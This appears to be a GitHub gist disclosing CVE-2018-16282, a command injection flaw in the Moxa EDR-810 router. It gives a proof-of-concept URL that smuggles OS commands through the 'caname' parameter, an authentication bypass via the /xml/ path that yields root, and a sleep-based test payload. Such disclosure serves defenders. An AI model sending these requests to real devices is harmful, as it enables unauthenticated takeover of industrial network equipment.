Skip to content

Instantly share code, notes, and snippets.

@tim124058
Created September 19, 2018 09:50
Show Gist options
  • Save tim124058/5c4babe391a016c771d2cccabead21cb to your computer and use it in GitHub Desktop.
Save tim124058/5c4babe391a016c771d2cccabead21cb to your computer and use it in GitHub Desktop.
CVE-2018-16282:EDR-810 Remote Code Execution

CVE-2018-16282

Suggested description :

Commmand injection vulnerability in the web server functionality of Moxa EDR-810 V4.2 build 18041013 allows remote attackers to execute arbitrary OS commands with root privilege via the "caname" parameter in the "/xml/net_WebCADELETEGetValue" uri.

@tim124058
Copy link
Author

POC:

An authenticated attacker can use HTTP GET request to remotely execute arbitrary OS commands with ROOT privilege.
like this :

http://<IP>/goform/net_WebCADELETEGetValue?caname=";<OS COMMAND>;"

BUT if replace /goform/ to /xml/,
the remote attacker can use ROOT privilege to execute arbitrary OS commands without any authentication.
like this :

http://<IP>/xml/net_WebCADELETEGetValue?caname=";<OS COMMAND>;"


Test payload:

If the page takes about 5 seconds to load, it means that it will be affected by this vulnerability.

http://<IP>/xml/net_WebCADELETEGetValue?caname="; sleep 5 ;"

test_poc

Get shell:

Attacker can execute arbitrary OS commands with root privilege.
revshell

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment